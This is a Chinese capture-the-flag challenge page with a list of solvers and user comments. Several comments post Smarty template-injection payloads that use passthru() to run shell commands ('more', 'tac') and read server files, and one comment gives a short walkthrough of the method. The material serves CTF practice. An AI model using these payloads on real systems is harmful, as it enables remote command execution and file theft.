评分(13)
解题动态
言寺介 攻破了该题 6小时前
黎悦依 攻破了该题 6小时前
潘福演 攻破了该题 7小时前
覃允哥哥 攻破了该题 7小时前
coap012 攻破了该题 7小时前
蒙亮江 攻破了该题 7小时前
容大晋 攻破了该题 7小时前
党玉新 攻破了该题 7小时前
刘德龙 攻破了该题 8小时前
834bug 攻破了该题 19小时前
qiezi 攻破了该题 20小时前
木秀于林 攻破了该题 20小时前
bhcxzhdsa 攻破了该题 1天前
农群丹 攻破了该题 1天前
05su 攻破了该题 1天前
YTT 攻破了该题 1天前
kklff4399 攻破了该题 1天前
莫泽明 攻破了该题 1天前
陆美宏 攻破了该题 1天前
评论
coap012 7小时前
举报
flag{*******}
fuhaiyan 3天前
举报
?a={{passthru('more ../../../*|grep fla')}}
小小大怪 9天前
举报
?a={{passthru('more ../../../*|grep fla')}}
罗满佳 9天前
举报
?a={{passthru('more ../../../*|grep fla')}}
李泽渊 9天前
举报
?a={{passthru('more ../../../*|grep fla')}}
对对对对对对对对 1月前
举报
?key={{passthru(%27tac%20/_4427%27)}}
anony 5月前
举报
flag{********}
人闲桂花落 6月前
举报
tac命令读取也可
docker0w 1年前
举报
1. 随意构造URL参数获取源代码信息 ?test=test 2. 根据源代码得知使用Smarty 并搜索得知存在模板注入漏洞 3. 根据已过滤函数,使用passthru函数即可回显 4. 使用passthru执行命令 ls -a / 得到根据下存在start.sh 脚本信息 5. 根据脚本信息得知flag为随机生成在根路径下 且使用_下划线文件明名 6. 使用show_source获
bx33661 1年前
举报
?key={passthru("tac%20/_28710")}